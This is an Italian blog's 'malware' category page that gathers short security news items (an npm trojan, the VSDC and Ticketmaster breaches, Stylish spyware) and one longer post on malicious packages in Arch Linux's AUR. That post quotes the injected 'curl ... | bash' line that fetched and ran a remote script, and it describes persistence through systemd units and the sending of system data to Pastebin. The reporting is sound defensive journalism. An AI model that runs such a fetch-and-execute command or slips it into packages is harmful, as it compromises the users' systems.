Archivi categoria: malware

Trojan nel repository di npm, ma la reazione è esemplare…

Facebooktwittergoogle_plusredditlinkedin

L’attacco mirava a rubare le credenziali degli iscritti alla piattaforma. Ma npm usa un sistema basato su token e ha risolto il problema in meno di 2 ore. Avrebbe potuto portare a un vero disastro l’attacco che nella notte tra l’11 e il 12 luglio ha preso di mira npm. Il package manager npm è […]

L’articolo Trojan nel repository di npm, ma la reazione è esemplare… proviene da Securityinfo.it.

I software VSDC sono gratuiti… e anche il malware!

Facebooktwittergoogle_plusredditlinkedin

Un gruppo di pirati ha violato il sito del produttore per inserire malware nei software freeware per il montaggio audio e video. Per tre volte… Se avete scaricato un software di VSDC tra il 18 giugno e il 6 luglio, sarà meglio che vi prepariate a eseguire una scansione approfondita con il vostro antivirus. Come […]

L’articolo I software VSDC sono gratuiti… e anche il malware! proviene da Securityinfo.it.

Non solo Ticketmaster: i pirati hanno colpito 800 siti di e-commerce

Facebooktwittergoogle_plusredditlinkedin

L’attacco al sito per la vendita di biglietti per concerti ed eventi fa parte di una campagna più ampia del gruppo criminale Magecart. Il furto di carte di credito ai danni dei clienti di Ticketmaster è solo la punta di un iceberg che potrebbe aver coinvolto più di 800 siti di e-commerce. A spiegarlo sono […]

L’articolo Non solo Ticketmaster: i pirati hanno colpito 800 siti di e-commerce proviene da Securityinfo.it.

Prende il controllo del servizio VPN di Hola per rubare Bitcoin

Facebooktwittergoogle_plusredditlinkedin

Il pirata dirottava gli utenti di MyEtherWallet.com su un sito da lui controllato per rubargli le credenziali e sottrarre cripto-valuta. Quando si usa un servizio VPN si è portati a pensare che la nostra connessione sia più sicura, al di fuori dalla portata di spioni ed eventuali malintenzionati che puntano a tracciare i nostri dati. […]

L’articolo Prende il controllo del servizio VPN di Hola per rubare Bitcoin proviene da Securityinfo.it.

Malware nel repository di Arch Linux

Facebooktwittergoogle_plusredditlinkedin

Il codice malevolo era nascosto in un componente per la gestione dei PDF. Gli esperti: “era il primo passo per un attacco più elaborato”. Ci sono dozzine di ottimi motivi per cui i pirati prendono di mira gli utenti Linux. Il principale è che, di solito, il sistema operativo open source viene installato sui server, […]

L’articolo Malware nel repository di Arch Linux proviene da Securityinfo.it.

Trovato malware nel repository AUR di Arch Linux

Facebooktwittergoogle_plusredditlinkedin

Due settimane fa era toccato ad uno dei mirror dei repository di Gentoo; oggi la notizia che anche Arch User Repository (AUR) è stato compromesso. AUR permette l’installazione di software non ufficialmente supportato da Arch; i pacchetti ospitati sono praticamente delle “ricette” per verificare (e installare) le dipendenze, quindi scaricare, se necessario compilare, ed infine pacchettizzare il software richiesto; a questo punto pacman (il gestore di pacchetti di Arch) può installarlo come qualsiasi altro pacchetto.

Calma, però: a differenza di Gentoo, dove il numero di pacchetti modificati è stato tanto consistente da considerare il repository come “totalmente compromesso”, per Arch sembra che i pacchetti contenenti codice malevolo si contino sulle dita di una mano (per ora).

Un utente ha segnalato tramite la mailing list di Arch una variazione nel pacchetto acrored presente in AUR: il pacchetto, pur risultando “orfano” (ovvero senza maintainer, un utente di riferimento che lo gestisse), era stato modificato improvvisamente il 7 Luglio dall’utente “xeactor”, aggiungendo del codice assolutamente non sospetto:

curl -s https://ptpb.pw/~x|bash -&

L’utente medio di Arch, lo sappiamo (ed ogni riferimento ad altri autori del blog è puramente casuale, ndr), adora leggersi il contenuto dei pacchetti tra una compilazione e l’altra, dunque inutile dire che il problema è stato immediatamente indirizzato e ben 6 minuti dopo era stato ripristinato il commit precedente.

Questa segnalazione ha fatto scattare una serie di controlli sugli altri pacchetti e ne sono stati trovati altri due modificati con lo stesso modus operandi.

Per quanti riguarda questi ultimi due, non è ben chiaro cosa potesse voler mai fare visto che lo script “malevolo” raccoglieva info di sistema tramite un uname -a, reperiva la lista dell’hardware, alcune informazioni riguardanti pacman e l’output di systemctl list-units per tentare di spedire il tutto a pastebin.com.

La malvagità dell’operazione termina qui. Il secondo script, quello che avrebbe dovuto inviare l’output a Pastebin aveva un errorino: la funzione di upload si chiamava “upload” ma lo script cercava di richiamare la funzione “uploader”. La cigliegina sullo script è stata indubbiamente la API key di Pastebin *in chiaro* inclusa nel codice. Un vero malware. Nel senso che è stato fatto proprio mal.

Per quanto riguarda la curl inserita in acrored invece, la cosa sembra più strutturata: la curl scarica uno script per procurarsi un secondo script in grado di installare una unit di systemd che periodicamente rieseguiva il secondo script per installare un’altra unit.

Da alcune ricerche effettuate degli utenti e segnalate su Reddit, sembra che l’utente “xeactor” avesse pubblicato dei pacchetti per il mining di criptovalute, ed il sospetto è proprio quello che cercasse di infilare alcuni di questi in altri pacchetti AUR.

Cosa ci insegna questa storia? Ci insegna che forse dovremmo controllare i pacchetti generati da utenti che troviamo sui vari repo, Arch o meno (e che forse gli utenti Arch non fanno malissimo ad essere pignoli).

E sicuramente che dovremmo ricordarci di come chiamiamo le funzioni negli script, se vogliamo usarle eh…

L’estensione ha uno spyware. Chrome e Firefox bloccano Stylish

Facebooktwittergoogle_plusredditlinkedin

Il proprietario di Stylish ha cambiato le policy lo scorso gennaio e nelle nuove versioni registrava l’attività Web degli utenti. Non è la prima volta che succede e, purtroppo, è probabile che non sia nemmeno l’ultima. I casi in cui i nuovi proprietari di estensioni e add-on per browser abusano della loro posizione, infatti, si […]

L’articolo L’estensione ha uno spyware. Chrome e Firefox bloccano Stylish proviene da Securityinfo.it.

Arrivano i primi attacchi che sfruttano i file Windows Settings Shortcut

Facebooktwittergoogle_plusredditlinkedin

È passata solo una settimana dall’allarme dei ricercatori sull’uso del nuovo formato file per portare attacchi a Windows, ma i pirati sono già al lavoro. È quasi confortante sapere che certe dinamiche, nel mondo della sicurezza, si verificano con una puntualità e precisione svizzere. Una di queste è l’inesorabilità con cui i pirati informatici sfruttano […]

L’articolo Arrivano i primi attacchi che sfruttano i file Windows Settings Shortcut proviene da Securityinfo.it.